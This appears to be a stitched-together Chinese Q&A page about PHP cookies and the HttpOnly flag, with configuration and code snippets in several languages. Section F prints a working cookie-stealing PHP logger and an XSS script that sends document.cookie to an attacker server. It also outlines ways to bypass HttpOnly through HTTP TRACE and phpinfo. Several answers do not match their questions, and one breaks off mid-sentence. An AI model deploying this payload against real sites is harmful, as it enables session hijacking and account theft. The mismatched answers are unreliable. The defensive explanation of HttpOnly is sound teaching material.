httponlyphp

A. php 创建cookie 时为什么会默认生成httponly

首先看下php.ini是不是默认配置了httponly.

session.cookie_httponly = On

然后看看是否有页面设置了默认配置，

ini_set("session.cookie_httponly", 1);

一般没有配置但是却带了httponlhy一般情况是其 他地方有修改，要么是默认配置文件，要么是在初始化文件里面修改的。

B. php cookie 取消httponly

php cookie 取消httponl
利用HttpResponse的addHeader方法，设置Set-Cookie的值

cookie字符串的格式：key=value; Expires=date; Path=path; Domain=domain; Secure; HttpOnly
//设置cookie

response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");

//设置多个cookie

response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");

response.addHeader("Set-Cookie", "timeout=30; Path=/test; HttpOnly");

//设置https的cookie

response.addHeader("Set-Cookie", "uid=112; Path=/; Secure; HttpOnly");

在实际使用中，我们可以使FireCookie查看我们设置的Cookie 是否是HttpOnly

C. php编程问题请大侠们来指教小弟一些问题

一般记住密码的功能都是用cookie来实现的.
使用 setcookie()函数设置cookie:
bool setcookie ( string name [, string value [, int expire [, string path [, string domain [, bool secure [, bool
httponly]]]]]] )
name: cookie 变量名
value: cookie 变量的值
expire: 有效期结束的时间
path: 有效目录
domain: 有效域名，顶级域唯一
secure: 如果值为 1，则cookie 只能在https 连接上有效，如果为默认值 0，则http 和 https 都可
以。
直接用php 内置超级全局变量$_COOKIE 就可以读取浏览器端的cookie。
上面例子中设置了cookie "TestCookie"，现在我们来读取：
print $_COOKIE['TestCookie'];
COOKIE 是不是被输出了?!
删除cookie

只需把有效时间设为小于当前时间，和把值设置为空。例如：
setcookie("name", "", time()-1);

D. 如何让java支持httponly

目前sun公司还没有公布相关的API，但PHP、C#均有实现。搞javaEE的兄弟们比较郁闷了，别急下文有变通实现

HttpOnly的设置样例
javaEE
1 response.setHeader("Set-Cookie", "cookiename=value;
2 Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");
具体参数的含义再次不做阐述，设置完毕后通过js脚本是读不到该cookie的，但使用如下方式可以读取
1 Cookie cookies[]=request.getCookies();
C#
1 HttpCookie myCookie = new HttpCookie("myCookie");
2 myCookie.HttpOnly = true;
3 Response.AppendCookie(myCookie);
VB.NET
1 Dim myCookie As HttpCookie = new HttpCookie("myCookie")
2 myCookie.HttpOnly = True
3 Response.AppendCookie(myCookie)

但是在.NET 1.1 ,中您需要手动添加
1 Response.Cookies[cookie].Path += ";HTTPOnly";
PHP4
1 header("Set-Cookie: hidden=value; httpOnly");

PHP5
1 setcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE);
最后一个参数为HttpOnly属性

E. php curl获取的cookie带httponly怎么办

新浪sae平台的所有目录都是只读的,不可写.如果想写入数据,可以用storage.
或者使用SAE的临时目录.

F. 如何HttpOnly的cookie与AJAX请求工作

随着B/S的普及，我们平时上网都是依赖于http协议完成，而Http是无状态的，即同一个会话的连续两个请求互相不了解，他们由最新实例化的环境进行解析，除了应用本身可能已经存储在全局对象中的所有信息外，该环境不保存与会话有关的任何信息，http是不会为了下一次连接而维护这次连接所传输的信息的。所以为了在每次会话之间传递信息，就需要用到cookie和session，无论是什么，都是为了让服务器端获得一个token来检查合法性，很多时候都是在cookie中存储一个sessionID，服务器来识别该用户，那么安全隐患也就引申而出了，只要获得这个cookie，就可以取得别人的身份，特别是管理员等高级权限帐号时，危害就大了，而XSS就是在别人的应用程序中恶意执行一段JS以窃取用户的cookie。
那么如何获得Cookie劫持呢?在浏览器中的document对象中，就储存了Cookie的信息，而利用js可以把这里面的Cookie给取出来，只要得到这个Cookie就可以拥有别人的身份了。下面简单说说如何窃取cookie。
接收cookie的PHP文件ck.php为：
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookie.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
把这个文件放在自己的服务器上，比如我们搭建的服务器为：http://10.65.21.78:8080 .
那么构造XSS语句：
<script>window.open('http://10.65.21.78:8080/ck.php?c='+document.cookie)</script>
当执行script成功时就会把cookie发送到自己的服务器下cookie.txt文件中。XSS攻击是多么可怕的事情。
说了这么多，貌似还没有提到HttpOnly，这是哪般？莫及！这就到了！如何保障我们的Cookie安全呢？Cookie都是通过document对象获取的，我们如果能让cookie在浏览器中不可见就可以了，那HttpOnly就是在设置cookie时接受这样一个参数，一旦被设置，在浏览器的document对象中就看不到cookie了。而浏览器在浏览网页的时候不受任何影响，因为Cookie会被放在浏览器头中发送出去(包括Ajax的时候)，应用程序也一般不会在JS里操作这些敏感Cookie的，对于一些敏感的Cookie我们采用HttpOnly，对于一些需要在应用程序中用JS操作的cookie我们就不予设置，这样就保障了Cookie信息的安全也保证了应用。
给浏览器设置Cookie的头如下：
Set-Cookie: =[; =]
[; expires=][; domain=]
[; path=][; secure][; HttpOnly]
如果 Cookie 具有 HttpOnly 特性且不能通过客户端脚本访问，则为 true；否则为 false。默认值为 false。
但是，也可以看到HttpOnly并不是万能的，首先它并不能解决XSS的问题，仍然不能抵制一些有耐心的黑客的攻击，甚至一些基于XSS的proxy也出现了，但是已经可以提高攻击的门槛了，起码XSS攻击不是每个脚本小子都能完成的了，而且其他的那些攻击手法因为一些环境和技术的限制，并不像Cookie窃取这种手法一样通用。
HttpOnly也是可能利用一些漏洞或者配置Bypass的，关键问题是只要能取到浏览器发送的Cookie头就可以了。譬如以前出现的Http Trace攻击就可以将你的Header里的Cookie回显出来，利用Ajax或者flash就可以完成这种攻击，这种手法也已经在Ajax和flash中获得修补。另外一个关于配置或者应用程序上可能Bypass的显着例子就是phpinfo，大家知道phpinfo会将浏览器发送的http头回显出来，其中就包括我们保护的auth信息，而这个页面经常存在在各种站点上，只要用ajax取phpinfo页面，取出header头对应的部分就可以获得Cookie了。一些应用程序的不完善也可能导致header头的泄露，这种攻击方式对于基本验证保护的页面一样可以攻击。
HttpOnly在IE 6以上，Firefox较新版本都得到了比较好的支持，并且在如Hotmail等应用程序里都有广泛的使用，并且已经是取得了比较好的安全效果。
那问题就来了，大家想想，HttpOnly 主要是为了限制web页面程序的browser端script程序读取cookie， 实际是浏览器通过协议实现限制的，黑客可不会那么傻，肯定不会用HTTP协议来读取cookie，肯定是在socket层面写抓包程序，相当于写一个低于IE6版本的应用程序。
所以，HttpOnly并不是万能的。

G. php header("Set-Cookie httpOnly为什么 不能两次

这相当于一个hashmap，对同一个key，多次操作，就是后者覆盖前者。你要做多次，最好对Set-Cooke：做拼接，一次写入。

H. 如何取得httponly属性的cookie

session 分成两部分，session空间存放于服务器端，打开空间的ID 存放于 客户端的cookie， 如果客户端关闭了cookie，session就不能正常的使用。
来源：
Session 的中文译名叫做“会话”，其本来的含义是指有始有终的一系列动作/消息，比如打电话时从拿起电话拨号到挂断电话这中间的一系列过程可以称之为一个 session。目前社会上对session的理解非常混乱：有时候我们可以看到这样的话“在一个浏览器会话期间，...”，这里的会话是指从一个浏览器窗口打开到关闭这个期间；也可以看到“用户（客户端）在一次会话期间”这样一句话，它可能指用户的一系列动作（一般情况下是同某个具体目的相关的一系列动作，比如从登录到选购商品到结账登出这样一个网上购物的过程；然而有时候也可能仅仅是指一次连接；其中的差别只能靠上下文来推断了。

然而当session一词与网络协议相关联时，它又往往隐含了“面向连接”和/或“保持状态”这样两个含义，“面向连接”指的是在通信双方在通信之前要先建立一个通信的渠道，比如打电话，直到对方接了电话通信才能开始。“保持状态”则是指通信的一方能够把一系列的消息关联起来，使得消息之间可以互相依赖，比如一个服务员能够认出再次光临的老顾客并且记得上次这个顾客还欠店里一块钱。这一类的例子有“一个TCP session”或者“一个POP3 session”。

鉴于这种混乱已不可改变，要为session下个定义就很难有统一的标准。而在阅读session相关资料时，我们也只有靠上下文来推断理解了。不过我们可以这样理解：例如我们打电话，从拨通的那一刻起到挂断电话期间，因为电话一直保持着接通的状态，所以把这种接通的状态叫做session。它是访客与整个网站交互过程中一直存在的公有变量，在客户端不支持COOKIE的时候，为了保证数据正确、安全，就采用SESSION变量。访问网站的来客会被分配一个唯一的标识符，即所谓的会话 ID。它要么存放在客户端的 cookie，要么经由 URL 传递。

SESSION的发明填补了 HTTP协议的局限：HTTP协议被认为是无状态协议，无法得知用户的浏览状态，当它在服务端完成响应之后，服务器就失去了与该浏览器的联系。这与 HTTP协议本来的目的是相符的，客户端只需要简单的向服务器请求下载某些文件，无论是客户端还是服务器都没有必要纪录彼此过去的行为，每一次请求之间都是独立的，好比一个顾客和一个自动售货机或者一个普通的（非会员制）大卖场之间的关系一样。

因此通过SESSION(cookie 是另外一种解决办法)记录用户的有关信息，以供用户再次以此身份对web服务器提起请求时作确认。会话的发明使得一个用户在多个页面间切换时能够保存他的信息。网站编程人员都有这样的体会，每一页中的变量是不能在下一页中使用的(虽然form，url也可以实现，但这都是非常不理想的办法)，而 SESSION中注册的变量就可以作为全局变量使用了。

那么SESSION到底有什么用处呢？网上购物时大家都用过购物车，你可以随时把你选购的商品加入到购物车中，最后再去收银台结帐。在整个过程中购物车一直扮演着临时存贮被选商品的角色，用它追踪用户在网站上的活动情况，这就是 SESSION的作用，它可以用于用户身份认证，程序状态记录，页面之间参数传递等。

SESSION的实现中采用COOKIE技术，SESSION会在客户端保存一个包含session_id(SESSION编号)的COOKIE；在服务器端保存其他session变量，比如 session_name等等。当用户请求服务器时也把session_id一起发送到服务器，通过session_id提取所保存在服务器端的变量，就能识别用户是谁了。同时也不难理解为什么SESSION有时会失效了。

当客户端禁用COOKIE时(点击IE中的“工具”— “Internet选项”，在弹出的对话框里点击“安全”—“自定义级别”项，将“允许每个对话COOKIE”设为禁用)，session_id将无法传递，此时SESSION失效。不过php5在linux/unix平台可以自动检查cookie状态，如果客户端设置了禁用，则系统自

请采纳评分一下吧!

I. HTML静态页如何处理HTTPONLY问题

使用PHP来设置HttpOnly
PHP支持从5.2.0版开始设置HttpOnly标志（2006年11月）。
对于由PHP管理的会话cookie，该标志可以通过参数在HttpOnly中的php.ini PHP手册中永久设置：
session.cookie_httponly =true;

或通过函数[6]在脚本中和期间：
void session_set_cookie_params（int $ lifetime [，string $ path [，string $ domain
[，bool $ secure = false [，bool $ httponly = false]]]]）

对于应用程序cookie setcookie（）中的最后一个参数，设置HttpOnly标志[7]：
bool setcookie（string $ name [，string $ value [，int $ expire = 0 [，string $ path
[，string $ domain [，bool $ secure = false [，bool $ httponly = false]]]]]]）

J. 怎么爬取httponly

手动在浏览器中获取cookie并且设置到我的爬虫里面 是可以进行登陆后的操作的。

在Web安全领域，跨站脚本攻击时最为常见的一种攻击形式，也是长久以来的一个老大难问题，而本文将向读者介绍的是一种用以缓解这种压力的技术，即HTTPonly cookie。

什么是HttpOnly

如果您在cookie中设置了HttpOnly属性，那么通过js脚本将无法读取到cookie信息，这样能有效地防止XSS攻击，目前sun公司还没有公布相关的API，但PHPC均有实现。搞javaEE的兄弟们比较郁闷了，别急下文有变通实现。